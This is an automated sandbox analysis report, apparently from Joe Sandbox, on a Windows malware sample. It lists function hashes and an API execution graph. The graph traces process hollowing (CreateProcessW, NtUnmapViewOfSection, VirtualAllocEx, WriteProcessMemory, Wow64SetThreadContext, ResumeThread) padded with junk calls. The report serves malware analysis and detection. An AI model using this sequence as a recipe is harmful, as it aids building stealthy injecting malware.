                                                                  • Instruction ID: 5e6b4c9483f2f7c51195c5a922daefa23dd3e15a114a57c8b2c2df2eadd9ead3
                                                                  • Opcode Fuzzy Hash: 3d83e3763f9cb26a47f97c377c5ba6a369e8466b53bdeef0079a243f54f614f4
                                                                  • Instruction Fuzzy Hash: 41D09EB06C1F469EF718EBE15C85613359F9740349F40A429B143472D1EEA589445FE5
                                                                  Function 00607D6C Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetStringTypeA.KERNEL32(?,00000002,?,00000080,?), ref: 00607E66
                                                                  • GetThreadLocale.KERNEL32 ref: 00607D96
                                                                    • Part of subcall function 00607CF4: GetCPInfo.KERNEL32(00000000,?), ref: 00607D0D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocaleStringThreadType
                                                                  • String ID:
                                                                  • API String ID: 1505017576-0
                                                                  • Opcode ID: c20fea7ece837fd4a4d4c232880b2c9fb4836bd1c3298877a86fcb63a872c9ac
                                                                  • Instruction ID: 031fbc90ea44a9d57a695ee475c96b9f8855e0aa644ccf8bf3c3245cd95ddff9
                                                                  • Opcode Fuzzy Hash: c20fea7ece837fd4a4d4c232880b2c9fb4836bd1c3298877a86fcb63a872c9ac
                                                                  • Instruction Fuzzy Hash: 84312621EC93858BD764DB64EC017A73FA7EB91305F04A0D9E9448B3D2EB346C49C766
                                                                  Function 006076BC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0060787F), ref: 00607729
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0060787F), ref: 0060774B
                                                                    • Part of subcall function 00604B70: LoadStringA.USER32 ref: 00604BA2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FileLoadModuleNameQueryStringVirtual
                                                                  • String ID: |Q`
                                                                  • API String ID: 902310565-1287144811
                                                                  • Opcode ID: f04f175d259c25fdcbc041710ef7f9a517576aab3b3a3207c45b177d1155a1ec
                                                                  • Instruction ID: 29300fce4ad5f21c6a0c8294c9238be0950d320ce33057e9c1de983e8ff0d5f7
                                                                  • Opcode Fuzzy Hash: f04f175d259c25fdcbc041710ef7f9a517576aab3b3a3207c45b177d1155a1ec
                                                                  • Instruction Fuzzy Hash: CE51D270A44658DFDB65DB68CD85BCAB7FAAB48300F4041E9E508AB391E770AE84CF51

                                                                  Execution Graph

                                                                  Execution Coverage:4.1%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0.3%
                                                                  Total number of Nodes:1682
                                                                  Total number of Limit Nodes:12
                                                                  execution_graph 5779 401040 5782 401000 EndTask 5779->5782 5783 401015 5782->5783 6581 6094e0 6582 6094bc 6581->6582 6583 603a10 11 API calls 6582->6583 6584 6094cc 6583->6584 6585 6044b4 13 API calls 6584->6585 6586 6094da 6585->6586 6182 403c42 6183 403c51 6182->6183 6184 403c56 MultiByteToWideChar 6183->6184 6185 403cbc 6183->6185 6184->6185 6186 403c6f LCMapStringW 6184->6186 6186->6185 6187 403c8a 6186->6187 6188 403c90 6187->6188 6190 403cd0 6187->6190 6188->6185 6189 403c9e LCMapStringW 6188->6189 6189->6185 6190->6185 6191 403d08 LCMapStringW 6190->6191 6191->6185 6192 403d20 WideCharToMultiByte 6191->6192 6192->6185 6587 6072e2 6588 6072e4 6587->6588 6589 6064bc 42 API calls 6588->6589 6590 60731d 6589->6590 6591 603a40 11 API calls 6590->6591 6592 607328 6591->6592 6593 6039ec 11 API calls 6592->6593 6594 60733d 6593->6594 6595 4018c3 6602 401955 6595->6602 6597 4018ce 6598 4018dc 6597->6598 6599 4024d8 7 API calls 6597->6599 6600 402511 7 API calls 6598->6600 6599->6598 6601 4018e5 6600->6601 6603 401966 23 API calls 6602->6603 6604 401962 6603->6604 6604->6597 5784 4030c5 5785 4030d8 5784->5785 5786 403111 HeapAlloc 5785->5786 5790 40313c 5785->5790 5791 40268d 5785->5791 5806 4034e6 5785->5806 5814 4026ee LeaveCriticalSection 5785->5814 5786->5785 5786->5790 5792 4026e3 EnterCriticalSection 5791->5792 5793 4026a5 5791->5793 5792->5785 5815 402c80 5793->5815 5797 40268d 18 API calls 5799 4026c3 5797->5799 5798 4026bb 5798->5797 5800 4026d4 5799->5800 5801 4026ca InitializeCriticalSection 5799->5801 5824 402b39 5800->5824 5802 4026d9 5801->5802 5837 4026ee LeaveCriticalSection 5802->5837 5805 4026e1 5805->5792 5810 403518 5806->5810 5807 4035c0 5888 4038a0 5807->5888 5810->5807 5813 4035d4 5810->5813 5881 4037ef 5810->5881 5813->5785 5814->5785 5838 402c92 5815->5838 5818 4018ce 5819 4018d7 5818->5819 5820 4018dc 5818->5820 5853 4024d8 5819->5853 5859 402511 5820->5859 5825 402b42 5824->5825 5826 402b7f 5824->5826 5827 40268d 19 API calls 5825->5827 5826->5802 5828 402b49 5827->5828 5829 402b55 5828->5829 5830 402b68 5828->5830 5873 4031bb 5829->5873 5880 4026ee LeaveCriticalSection 5830->5880 5833 402b6f HeapFree 5833->5826 5834 402b5c 5879 4026ee LeaveCriticalSection 5834->5879 5836 402b63 5836->5802 5837->5805 5839 4026ad 5838->5839 5841 402c99 5838->5841 5839->5798 5839->5818 5841->5839 5842 402cbe 5841->5842 5843 402ccc 5842->5843 5844 402ce2 5842->5844 5846 40268d 19 API calls 5843->5846 5845 402cf4 HeapAlloc 5844->5845 5847 402ce9 5844->5847 5845->5847 5848 402cd3 5846->5848 5847->5841 5849 4034e6 5 API calls 5848->5849 5850 402cd9 5849->5850 5852 4026ee LeaveCriticalSection 5850->5852 5852->5844 5854 4024e2 5853->5854 5855 40250f 5854->5855 5856 402511 7 API calls 5854->5856 5855->5820 5857 4024f9 5856->5857 5858 402511 7 API calls 5857->5858 5858->5855 5861 402524 5859->5861 5860 4018e5 5860->5798 5861->5860 5862 40263b 5861->5862 5863 402564 5861->5863 5865 40264e GetStdHandle WriteFile 5862->5865 5863->5860 5864 402570 GetModuleFileNameA 5863->5864 5866 402588 5864->5866 5865->5860 5868 40399b 5866->5868 5869 4039a8 LoadLibraryA 5868->5869 5872 4039ea 5868->5872 5870 4039b9 GetProcAddress 5869->5870 5869->5872 5871 4039d0 GetProcAddress GetProcAddress 5870->5871 5870->5872 5871->5872 5872->5860 5874 403202 5873->5874 5875 4033f4 VirtualFree 5874->5875 5878 4034ae 5874->5878 5876 403458 5875->5876 5877 403467 VirtualFree HeapFree 5876->5877 5876->5878 5877->5878 5878->5834 5879->5836 5880->5833 5882 403832 HeapAlloc 5881->5882 5883 403802 HeapReAlloc 5881->5883 5885 4035b7 5882->5885 5886 403858 VirtualAlloc 5882->5886 5884 403821 5883->5884 5883->5885 5884->5882 5885->5807 5885->5813 5886->5885 5887 403872 HeapFree 5886->5887 5887->5885 5889 4038b2 VirtualAlloc 5888->5889 5891 4035c6 5889->5891 5891->5813 5908 4017c6 GetVersion 5940 4022c9 HeapCreate 5908->5940 5910 401824 5911 401831 5910->5911 5912 401829 5910->5912 5947 4021fb 5911->5947 6036 4018f3 5912->6036 5916 401836 5917 401842 5916->5917 5918 40183a 5916->5918 5957 40203f 5917->5957 5919 4018f3 8 API calls 5918->5919 5921 401841 5919->5921 5921->5917 5922 40184c GetCommandLineA 5971 401f0d 5922->5971 5926 401866 5994 401c07 5926->5994 5928 40186b 5929 401870 GetStartupInfoA 5928->5929 6007 401baf 5929->6007 5931 401882 5932 40188b 5931->5932 5933 401894 GetModuleHandleA 5932->5933 6011 401600 5933->6011 5941 4022e9 5940->5941 5942 4022fe 5940->5942 6059 403152 HeapAlloc 5941->6059 5942->5910 5945 402301 5945->5910 5946 4022f2 HeapDestroy 5946->5942 6061 402664 InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection 5947->6061 5949 402201 TlsAlloc 5950 402211 5949->5950 5951 40224b 5949->5951 6062 4030c5 5950->6062 5951->5916 5953 40221a 5953->5951 5954 402222 TlsSetValue 5953->5954 5954->5951 5955 402233 5954->5955 5956 402239 GetCurrentThreadId 5955->5956 5956->5916 5958 402c80 20 API calls 5957->5958 5959 402052 5958->5959 5960 402060 GetStartupInfoA 5959->5960 5961 4018ce 7 API calls 5959->5961 5967 40217f 5960->5967 5970 4020ae 5960->5970 5961->5960 5963 4021aa GetStdHandle 5965 4021b8 GetFileType 5963->5965 5963->5967 5964 4021ea SetHandleCount 5964->5922 5965->5967 5966 402c80 20 API calls 5966->5970 5967->5963 5967->5964 5968 402125 5968->5967 5969 402147 GetFileType 5968->5969 5969->5968 5970->5966 5970->5967 5970->5968 5972 401f28 GetEnvironmentStringsW 5971->5972 5973 401f5b 5971->5973 5974 401f30 5972->5974 5976 401f3c GetEnvironmentStrings 5972->5976 5973->5974 5975 401f4c 5973->5975 5978 401f74 WideCharToMultiByte 5974->5978 5979 401f68 GetEnvironmentStringsW 5974->5979 5977 40185c 5975->5977 5980 401ffa 5975->5980 5981 401fee GetEnvironmentStrings 5975->5981 5976->5975 5976->5977 6042 401cc0 5977->6042 5983 401fa8 5978->5983 5984 401fda FreeEnvironmentStringsW 5978->5984 5979->5977 5979->5978 5985 402c80 20 API calls 5980->5985 5981->5977 5981->5980 5986 402c80 20 API calls 5983->5986 5984->5977 5992 402015 5985->5992 5987 401fae 5986->5987 5987->5984 5988 401fb7 WideCharToMultiByte 5987->5988 5990 401fd1 5988->5990 5991 401fc8 5988->5991 5989 40202b FreeEnvironmentStringsA 5989->5977 5990->5984 5993 402b39 20 API calls 5991->5993 5992->5989 5993->5990 5995 401c14 5994->5995 5997 401c19 5994->5997 6070 402b1d 5995->6070 5998 402c80 20 API calls 5997->5998 5999 401c46 5998->5999 6000 4018ce 7 API calls 5999->6000 6006 401c5a 5999->6006 6000->6006 6001 401c9d 6002 402b39 20 API calls 6001->6002 6003 401ca9 6002->6003 6003->5928 6004 402c80 20 API calls 6004->6006 6005 4018ce 7 API calls 6005->6006 6006->6001 6006->6004 6006->6005 6008 401bb8 6007->6008 6010 401bbd 6007->6010 6009 402b1d 39 API calls 6008->6009 6009->6010 6010->5931 6129 4015c0 6011->6129 6015 401668 6133 401530 ShowCaret 6015->6133 6017 401678 6018 401530 ShowCaret 6017->6018 6019 40168e ShowCaret ShowCaret 6018->6019 6020 4016c3 6019->6020 6021 4016c5 ShowCaret 6020->6021 6022 4016e4 6021->6022 6023 4016e6 ShowCaret 6022->6023 6135 4015a0 GetPEB 6023->6135 6025 4016ef LoadLibraryA 6136 4014c0 6025->6136 6027 401721 EnumResourceNamesA 6138 401390 ShowCaret 6027->6138 6029 401737 ShowCaret 6030 401765 6029->6030 6031 401782 CreateProcessW 6030->6031 6141 4010d0 6031->6141 6033 401796 ShowCaret 6143 401170 ShowCaret 6033->6143 6035 4017aa 6051 401944 6035->6051 6037 401901 6036->6037 6038 4018fc 6036->6038 6040 402511 7 API calls 6037->6040 6039 4024d8 7 API calls 6038->6039 6039->6037 6041 40190a ExitProcess 6040->6041 6043 401cd2 6042->6043 6044 401cd7 GetModuleFileNameA 6042->6044 6045 402b1d 39 API calls 6043->6045 6046 401cfa 6044->6046 6045->6044 6047 402c80 20 API calls 6046->6047 6048 401d1b 6047->6048 6049 4018ce 7 API calls 6048->6049 6050 401d2b 6048->6050 6049->6050 6050->5926 6162 401966 6051->6162 6054 401a37 6171 402262 GetLastError TlsGetValue 6054->6171 6056 401b68 UnhandledExceptionFilter 6058 4018c0 6056->6058 6057 401a42 6057->6056 6057->6058 6060 4022ee 6059->6060 6060->5945 6060->5946 6061->5949 6063 4030d8 6062->6063 6064 403111 HeapAlloc 6063->6064 6065 40268d 20 API calls 6063->6065 6066 4034e6 5 API calls 6063->6066 6068 40313c 6063->6068 6069 4026ee LeaveCriticalSection 6063->6069 6064->6063 6064->6068 6065->6063 6066->6063 6068->5953 6069->6063 6071 402b26 6070->6071 6072 402b2d 6070->6072 6074 402745 6071->6074 6072->5997 6075 40268d 20 API calls 6074->6075 6076 402755 6075->6076 6085 4028f2 6076->6085 6080 4028ea 6080->6072 6082 402791 GetCPInfo 6084 4027a7 6082->6084 6083 40276c 6098 4026ee LeaveCriticalSection 6083->6098 6084->6083 6090 402998 GetCPInfo 6084->6090 6086 402912 6085->6086 6087 402902 GetOEMCP 6085->6087 6088 40275d 6086->6088 6089 402917 GetACP 6086->6089 6087->6086 6088->6082 6088->6083 6088->6084 6089->6088 6091 402a83 6090->6091 6093 4029bb 6090->6093 6091->6083 6099 403d7d 6093->6099 6097 403b2e 9 API calls 6097->6091 6098->6080 6100 403dae GetStringTypeW 6099->6100 6101 403dc6 6099->6101 6100->6101 6102 403dca GetStringTypeA 6100->6102 6103 403df1 GetStringTypeA 6101->6103 6104 403e15 6101->6104 6102->6101 6105 402a37 6102->6105 6103->6105 6104->6105 6107 403e2b MultiByteToWideChar 6104->6107 6111 403b2e 6105->6111 6107->6105 6108 403e4f 6107->6108 6108->6105 6109 403e89 MultiByteToWideChar 6108->6109 6109->6105 6110 403ea2 GetStringTypeW 6109->6110 6110->6105 6112 403b5e LCMapStringW 6111->6112 6114 403b7a 6111->6114 6113 403b82 LCMapStringA 6112->6113 6112->6114 6113->6114 6116 402a5b 6113->6116 6115 403bc3 LCMapStringA 6114->6115 6117 403be0 6114->6117 6115->6116 6116->6097 6117->6116 6118 403bf6 MultiByteToWideChar 6117->6118 6118->6116 6119 403c20 6118->6119 6119->6116 6120 403c56 MultiByteToWideChar 6119->6120 6120->6116 6121 403c6f LCMapStringW 6120->6121 6121->6116 6122 403c8a 6121->6122 6123 403c90 6122->6123 6125 403cd0 6122->6125 6123->6116 6124 403c9e LCMapStringW 6123->6124 6124->6116 6125->6116 6126 403d08 LCMapStringW 6125->6126 6126->6116 6127 403d20 WideCharToMultiByte 6126->6127 6127->6116 6130 4015d2 GetCurrentProcess 6129->6130 6131 4015e4 SHGetFolderPathW lstrcatW ShellExecuteW 6129->6131 6130->6131 6132 4015a0 GetPEB 6131->6132 6132->6015 6134 401562 6133->6134 6134->6017 6135->6025 6137 4014db 6136->6137 6137->6027 6139 4013bc 6138->6139 6140 401433 VirtualProtect 6139->6140 6140->6029 6142 401108 6141->6142 6142->6033 6144 4014c0 6143->6144 6145 4011b3 NtUnmapViewOfSection ShowCaret 6144->6145 6146 4014c0 6145->6146 6147 4011ec VirtualAllocEx ShowCaret 6146->6147 6148 4014c0 6147->6148 6149 40121b WriteProcessMemory ShowCaret 6148->6149 6150 4012b6 ShowCaret 6149->6150 6151 401237 ShowCaret ShowCaret 6149->6151 6153 4012ea 6150->6153 6152 4014c0 6151->6152 6154 401299 WriteProcessMemory 6152->6154 6155 4012ec ShowCaret 6153->6155 6154->6150 6154->6151 6156 4014c0 6155->6156 6157 401320 WriteProcessMemory ShowCaret ShowCaret 6156->6157 6158 4014c0 6157->6158 6159 40135b Wow64SetThreadContext ShowCaret 6158->6159 6160 4014c0 6159->6160 6161 40137a ResumeThread 6160->6161 6161->6035 6163 401a0b 20 API calls 6162->6163 6164 40196c 6163->6164 6165 401977 GetCurrentProcess TerminateProcess 6164->6165 6168 401988 6164->6168 6165->6168 6166 4019f2 6169 401a14 LeaveCriticalSection 6166->6169 6167 4019f9 ExitProcess 6168->6166 6168->6167 6170 4018af 6169->6170 6170->6054 6172 4022bd SetLastError 6171->6172 6173 40227e 6171->6173 6172->6057 6174 4030c5 21 API calls 6173->6174 6175 402287 6174->6175 6176 4022b5 6175->6176 6177 40228f TlsSetValue 6175->6177 6179 4018ce 7 API calls 6176->6179 6177->6176 6178 4022a0 6177->6178 6181 4022a6 GetCurrentThreadId 6178->6181 6180 4022bc 6179->6180 6180->6172 6181->6172 6605 6034e6 6607 6034e8 6605->6607 6609 602920 6607->6609 6612 6039d4 6609->6612 6615 6038f4 6612->6615 6616 603909 6615->6616 6618 603932 6616->6618 6622 603868 6616->6622 6619 60397e FreeLibrary 6618->6619 6620 6039a2 ExitProcess 6618->6620 6619->6618 6623 6038c9 6622->6623 6625 603872 GetStdHandle WriteFile GetStdHandle WriteFile 6622->6625 6626 6038d2 MessageBoxA 6623->6626 6627 6038e5 6623->6627 6625->6618 6626->6627 6627->6618 6628 603ee6 6629 603ee8 6628->6629 6630 603f04 6629->6630 6631 603ef6 SysFreeString 6629->6631 6631->6630 6632 6034e8 6634 6034f7 6632->6634 6633 602920 7 API calls 6635 603584 6633->6635 6634->6633 7451 602fe8 7452 602ff2 7451->7452 7453 602880 11 API calls 7452->7453 7454 602ff7 7453->7454 6648 6038ec 6649 6038f0 6648->6649 6650 603868 5 API calls 6649->6650 6651 603932 6649->6651 6650->6651 6652 60397e FreeLibrary 6651->6652 6653 6039a2 ExitProcess 6651->6653 6652->6651 6194 60646e 6195 606470 6194->6195 6197 6064a0 6195->6197 6198 6060f8 6195->6198 6202 606121 6198->6202 6199 606132 6217 60644f 6199->6217 6202->6199 6204 6061da 11 API calls 6202->6204 6206 606222 6202->6206 6214 6060ec 6202->6214 6204->6202 6207 606233 6206->6207 6211 60628d 6206->6211 6209 60632b 6207->6209 6207->6211 6208 60644f 11 API calls 6208->6211 6213 605d04 6209->6213 6224 6060c8 6209->6224 6211->6208 6211->6213 6220 606070 6211->6220 6213->6202 6215 6039ec 11 API calls 6214->6215 6216 6060f6 6215->6216 6216->6202 6218 6039ec 11 API calls 6217->6218 6219 60645c 6218->6219 6219->6197 6221 606081 6220->6221 6229 605ce0 6221->6229 6223 6060c1 6223->6211 6225 6060e0 6224->6225 6226 6060d4 6224->6226 6227 602978 11 API calls 6225->6227 6226->6213 6228 6060e7 6227->6228 6228->6213 6232 6073a0 6229->6232 6231 605cf9 6231->6223 6233 6073ae 6232->6233 6242 604b70 6233->6242 6235 6073d8 6248 6064bc 6235->6248 6243 604b81 6242->6243 6244 604bb2 6242->6244 6243->6244 6261 60456c 6243->6261 6244->6235 6332 6064d0 6248->6332 6251 603a40 6252 603a44 6251->6252 6254 603a54 6251->6254 6252->6254 6255 603ab0 11 API calls 6252->6255 6253 603a82 6257 603a10 6253->6257 6254->6253 6256 6028b0 11 API calls 6254->6256 6255->6254 6256->6253 6259 603a16 6257->6259 6258 603a3c 6258->6231 6259->6258 6260 6028b0 11 API calls 6259->6260 6260->6259 6262 604580 6261->6262 6263 60459c LoadStringA 6261->6263 6262->6263 6270 604524 6262->6270 6265 603adc 6263->6265 6309 603ab0 6265->6309 6267 603aec 6314 6039ec 6267->6314 6271 604534 GetModuleFileNameA 6270->6271 6272 604550 6270->6272 6274 6047b8 GetModuleFileNameA RegOpenKeyExA 6271->6274 6272->6263 6275 60483a 6274->6275 6276 6047fa RegOpenKeyExA 6274->6276 6292 6045e0 GetModuleHandleA 6275->6292 6276->6275 6277 604818 RegOpenKeyExA 6276->6277 6277->6275 6279 6048c3 lstrcpynA GetThreadLocale GetLocaleInfoA 6277->6279 6281 6049f3 6279->6281 6282 6048fa 6279->6282 6281->6272 6282->6281 6285 60490a lstrlenA 6282->6285 6283 60489d RegCloseKey 6283->6272 6284 60487f RegQueryValueExA 6284->6283 6287 604923 6285->6287 6287->6281 6288 604951 lstrcpynA LoadLibraryExA 6287->6288 6289 60497d 6287->6289 6288->6289 6289->6281 6290 604987 lstrcpynA LoadLibraryExA 6289->6290 6290->6281 6291 6049bd lstrcpynA LoadLibraryExA 6290->6291 6291->6281 6293 604608 GetProcAddress 6292->6293 6294 60464c 6292->6294 6293->6294 6298 60461c 6293->6298 6295 604684 6294->6295 6296 604788 RegQueryValueExA 6294->6296 6299 6045b4 CharNextA 6294->6299 6295->6296 6297 60469e lstrcpynA 6295->6297 6296->6283 6296->6284 6305 6046bd 6297->6305 6298->6294 6300 604633 lstrcpynA 6298->6300 6302 60466c 6299->6302 6300->6296 6301 604774 lstrcpynA 6301->6296 6302->6296 6304 6045b4 CharNextA 6302->6304 6303 6045b4 CharNextA 6303->6305 6304->6295 6305->6296 6305->6301 6305->6303 6306 6046df lstrcpynA FindFirstFileA 6305->6306 6306->6296 6307 60470d FindClose lstrlenA 6306->6307 6307->6296 6308 60472c lstrcpynA lstrlenA 6307->6308 6308->6305 6310 603ab4 6309->6310 6311 603ad8 6309->6311 6318 602880 6310->6318 6311->6267 6315 6039f2 6314->6315 6316 603a0d 6314->6316 6315->6316 6328 6028b0 6315->6328 6316->6244 6319 6028a0 6318->6319 6320 602888 6318->6320 6319->6267 6320->6319 6322 602978 6320->6322 6323 60292c 6322->6323 6324 604ddc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6323->6324 6325 602951 6323->6325 6324->6325 6326 602920 7 API calls 6325->6326 6327 602973 6326->6327 6327->6319 6329 6028c8 6328->6329 6330 6028b5 6328->6330 6329->6316 6330->6329 6331 602978 11 API calls 6330->6331 6331->6329 6333 6064f5 6332->6333 6334 606520 6333->6334 6335 6060f8 42 API calls 6333->6335 6336 60657d 6334->6336 6343 606537 6334->6343 6335->6334 6337 603adc 11 API calls 6336->6337 6338 6064cb 6337->6338 6338->6251 6339 606572 6341 603e84 11 API calls 6339->6341 6340 6039ec 11 API calls 6340->6343 6341->6338 6343->6339 6343->6340 6344 6060f8 42 API calls 6343->6344 6345 603e84 6343->6345 6344->6343 6346 603e91 6345->6346 6350 603ec1 6345->6350 6348 603ab0 11 API calls 6346->6348 6349 603e9d 6346->6349 6347 6039ec 11 API calls 6347->6349 6348->6350 6349->6343 6350->6347 7455 6075ee 7456 6075f0 7455->7456 7459 607534 7456->7459 7458 6075f8 7460 607569 7459->7460 7461 60755d 7459->7461 7462 604b70 42 API calls 7460->7462 7464 607567 7460->7464 7463 603a84 11 API calls 7461->7463 7462->7464 7463->7464 7465 604b70 42 API calls 7464->7465 7466 6075a1 7465->7466 7467 6072e4 42 API calls 7466->7467 7468 6075b0 7467->7468 7469 6039ec 11 API calls 7468->7469 7470 6075c7 7469->7470 7471 6039ec 11 API calls 7470->7471 7472 6075cf 7471->7472 7472->7458 6662 6098f0 6669 604e28 GetModuleHandleA 6662->6669 6664 609900 6671 6087f8 6664->6671 6667 6038f4 7 API calls 6668 60990a 6667->6668 6670 604e5b 6669->6670 6670->6664 6672 608800 6671->6672 6672->6672 6714 608a50 GetPEB 6672->6714 6674 60881d 6675 608826 6674->6675 6715 608a6c GetPEB 6674->6715 6716 608dd8 6675->6716 6680 60883e 6681 6039ec 11 API calls 6680->6681 6682 608850 6681->6682 6728 609624 6682->6728 6685 609624 13 API calls 6686 608874 6685->6686 6687 609624 13 API calls 6686->6687 6688 608886 6687->6688 6689 603a40 11 API calls 6688->6689 6690 608893 6689->6690 6763 605e3c 6690->6763 6692 6088d2 6693 609624 13 API calls 6692->6693 6695 6088e4 6693->6695 6696 605e3c 42 API calls 6695->6696 6707 6088ec 6696->6707 6697 60889b 6697->6692 6698 609624 13 API calls 6697->6698 6700 603c68 11 API calls 6697->6700 6767 605d50 6697->6767 6698->6697 6699 60899f 6702 6044b4 13 API calls 6699->6702 6700->6697 6703 6089ba 6702->6703 6704 603a10 11 API calls 6703->6704 6706 6089c7 6704->6706 6706->6667 6707->6699 6708 603a84 11 API calls 6707->6708 6709 605e3c 42 API calls 6707->6709 6711 608cb8 11 API calls 6707->6711 6771 608a88 6707->6771 6787 608b94 6707->6787 6796 608c1c 6707->6796 6805 608eb4 6707->6805 6813 609014 6707->6813 6708->6707 6709->6707 6711->6707 6714->6674 6715->6675 6865 608cb8 6716->6865 6718 608e01 6719 608e09 LoadLibraryA 6718->6719 6720 608cb8 11 API calls 6719->6720 6721 608e23 6720->6721 6873 608d40 6721->6873 6724 603a10 11 API calls 6725 608839 6724->6725 6726 608a40 GetPEB 6725->6726 6726->6726 6727 608a4e 6726->6727 6727->6680 6729 60962d 6728->6729 6730 608cb8 11 API calls 6729->6730 6731 60966b 6730->6731 6732 609673 LoadLibraryA 6731->6732 6733 608cb8 11 API calls 6732->6733 6734 60968d 6733->6734 6735 608d40 lstrcmpA 6734->6735 6736 60969e 6735->6736 6737 608cb8 11 API calls 6736->6737 6738 6096b2 6737->6738 6739 608d40 lstrcmpA 6738->6739 6740 6096c3 6739->6740 6741 608cb8 11 API calls 6740->6741 6742 6096d7 6741->6742 6743 608d40 lstrcmpA 6742->6743 6744 6096e8 6743->6744 6745 608cb8 11 API calls 6744->6745 6746 6096fd 6745->6746 6747 608d40 lstrcmpA 6746->6747 6748 60970e 6747->6748 6749 608cb8 11 API calls 6748->6749 6750 609723 6749->6750 6751 608d40 lstrcmpA 6750->6751 6752 609734 6751->6752 6753 603adc 11 API calls 6752->6753 6754 609768 6753->6754 6755 603a40 11 API calls 6754->6755 6756 609773 6755->6756 6757 603a10 11 API calls 6756->6757 6758 609791 6757->6758 6759 6039ec 11 API calls 6758->6759 6760 609799 6759->6760 6761 6039ec 11 API calls 6760->6761 6762 608862 6761->6762 6762->6685 6764 605e4c 6763->6764 6765 605e6d 6764->6765 6766 605ce0 42 API calls 6764->6766 6765->6697 6766->6765 6768 605d60 6767->6768 6769 603adc 11 API calls 6768->6769 6770 605d68 6769->6770 6770->6697 6772 608aa8 6771->6772 6773 6039ec 11 API calls 6772->6773 6774 608ac6 6773->6774 6777 608b4f 6774->6777 6781 603e44 11 API calls 6774->6781 6782 608b0d 6774->6782 6783 603c68 11 API calls 6774->6783 6785 6039ec 11 API calls 6774->6785 6786 608b18 6774->6786 6775 603a10 11 API calls 6776 608b81 6775->6776 6776->6707 6778 608b5c 6777->6778 6779 6039ec 11 API calls 6777->6779 6780 603a40 11 API calls 6778->6780 6779->6778 6780->6786 6781->6774 6784 603a40 11 API calls 6782->6784 6783->6774 6784->6786 6785->6774 6786->6775 6788 608bae 6787->6788 6789 6039ec 11 API calls 6788->6789 6793 608bc3 6789->6793 6790 608bf4 6792 603a10 11 API calls 6790->6792 6791 603e44 11 API calls 6791->6793 6794 608c0e 6792->6794 6793->6790 6793->6791 6795 603c68 11 API calls 6793->6795 6794->6707 6795->6793 6797 608c3a 6796->6797 6798 608c89 6797->6798 6799 603bb8 11 API calls 6797->6799 6803 603c68 11 API calls 6797->6803 6800 6039ec 11 API calls 6798->6800 6799->6797 6801 608c9e 6800->6801 6802 6039ec 11 API calls 6801->6802 6804 608ca6 6802->6804 6803->6797 6804->6707 6806 608ec6 6805->6806 6883 6044a8 6806->6883 6808 608eef 6809 603e3c 11 API calls 6808->6809 6810 608f03 6809->6810 6811 6039ec 11 API calls 6810->6811 6812 608f22 6811->6812 6812->6707 6814 60901c 6813->6814 6815 608cb8 11 API calls 6814->6815 6816 609055 6815->6816 6817 609060 LoadLibraryA 6816->6817 6818 608cb8 11 API calls 6817->6818 6819 60907d 6818->6819 6820 609088 LoadLibraryA 6819->6820 6821 608cb8 11 API calls 6820->6821 6822 6090a5 6821->6822 6823 608d40 lstrcmpA 6822->6823 6824 6090b9 6823->6824 6825 608cb8 11 API calls 6824->6825 6826 6090d1 6825->6826 6827 608d40 lstrcmpA 6826->6827 6828 6090e5 6827->6828 6829 608cb8 11 API calls 6828->6829 6830 6090fd 6829->6830 6831 608d40 lstrcmpA 6830->6831 6832 609111 6831->6832 6833 608cb8 11 API calls 6832->6833 6834 609129 6833->6834 6835 608d40 lstrcmpA 6834->6835 6836 60913d 6835->6836 6837 608cb8 11 API calls 6836->6837 6838 609155 6837->6838 6839 608d40 lstrcmpA 6838->6839 6840 609169 6839->6840 6841 608cb8 11 API calls 6840->6841 6842 609180 6841->6842 6843 608d40 lstrcmpA 6842->6843 6844 609194 6843->6844 6845 608cb8 11 API calls 6844->6845 6846 6091ac 6845->6846 6847 608d40 lstrcmpA 6846->6847 6848 6091c0 6847->6848 6849 608cb8 11 API calls 6848->6849 6850 6091d8 6849->6850 6851 608d40 lstrcmpA 6850->6851 6852 6091ec 6851->6852 6853 608cb8 11 API calls 6852->6853 6854 609204 6853->6854 6855 608d40 lstrcmpA 6854->6855 6857 609218 6855->6857 6856 609354 6858 603a10 11 API calls 6856->6858 6857->6856 6950 608fac 6857->6950 6859 6094cc 6858->6859 6860 6044b4 13 API calls 6859->6860 6861 6094da 6860->6861 6861->6707 6863 6092c6 6863->6856 6956 604f9c 6863->6956 6867 608cd2 6865->6867 6866 608d10 6868 603a40 11 API calls 6866->6868 6867->6866 6877 603e3c 6867->6877 6870 608d1b 6868->6870 6871 6039ec 11 API calls 